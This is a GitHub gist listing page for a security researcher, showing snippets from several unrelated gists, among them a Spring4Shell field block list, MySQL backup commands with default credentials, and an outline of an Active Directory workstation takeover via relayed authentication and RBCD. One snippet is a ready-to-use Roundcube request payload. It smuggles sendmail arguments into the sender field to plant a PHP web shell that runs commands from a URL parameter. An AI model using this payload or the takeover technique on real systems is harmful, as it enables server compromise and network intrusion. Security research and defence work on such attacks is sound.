A Pen by Creative Tim on CodePen.
ihebski
/ gist:13c69f0badb50b8bbb76b92e6f7517f0
Last active
March 31, 2022 13:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // shared by @Retrospected: https://github.com/Retrospected/spring-rce-poc | |
| @InitBinder | |
| public void initBinder(WebDataBinder binder) { | |
| String[] blackList = {"class.*","Class.*","*.class.*",".*Class.*"}; | |
| binder.setDisallowedFields(blackList); | |
| } |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/expect -f | |
| # Constants | |
| set user "" | |
| set pass "" | |
| set timeout -1 | |
| # Options | |
| match_max 100000 | |
| log_user 0 |
ihebski
/ mysql-backup.sh
Created
December 27, 2021 01:41
backup and restore mysql database from defectdojo container
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Get container id | |
| docker ps | grep mysql | |
| # Backup | |
| docker exec -it <container_id> mysqldump -u defectdojo --password=defectdojo defectdojo > backup.sql | |
| # Restore | |
| docker exec -i <container_id> mysql -u defectdojo --password=defectdojo defectdojo < cat backup.sql |
ihebski
/ requirement.txt
Created
September 28, 2021 21:07
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| certifi==2021.5.30 | |
| charset-normalizer==2.0.6 | |
| click==8.0.1 | |
| Flask==2.0.1 | |
| Flask-SQLAlchemy==2.5.1 | |
| greenlet==1.1.1 | |
| idna==3.2 | |
| itsdangerous==2.0.1 | |
| Jinja2==3.0.1 | |
| MarkupSafe==2.0.1 |
ihebski
/ Workstation-Takeover.md
Created
July 28, 2021 11:36
— forked from gladiatx0r/Workstation-Takeover.md
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
ihebski
/ 100.release-setup
Last active
July 21, 2021 16:33
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env perl | |
| # Help the initial setup of configurable parameters. | |
| # If not yet available, create/update a generic $home/lib/setup-generic | |
| # Also, create/update a release specific config $home/lib/setup-$version | |
| # Chicken' egg situation: the parameters may have been passed to the | |
| # install script, but we may not have the required module installed to | |
| # process it. The values were passed via environment variables. | |
| use warnings; |
ihebski
/ gist:c5c800f3b47b6321639d3562e03ba49b
Created
November 17, 2020 22:47
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _token=VufHk5rpfJAVvw0SYqCYDZVUK4pKbgVy&_task=mail&_action=send&_id=19306581945fb451c9405a8&_attachments=&_from=example@example.com -OQueueDirectory=/tmp -X/var/www/html/roundcube/backdoor4.php&_to=example@pWnexAmplE.sh&_cc=&_bcc=&_replyto=&_followupto=&_subject=<?php echo passthru($_GET['cmd']); ?>&editorSelector=plain&_priority=0&_store_target=&_draft_saveid=&_draft=&_is_html=0&_framed=1&_message=pwn |
ihebski
/ gist:3073daff8e831ae899ab9049d57a651e
Created
October 20, 2020 20:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import re | |
| from furl import furl | |
| def param_extract(response, level, black_list, placeholder): | |
| ''' | |
| regexp : r'.*?:\/\/.*\?.*\=[^$]' | |
| regexp : r'.*?:\/\/.*\?.*\=' | |
| ''' |
NewerOlder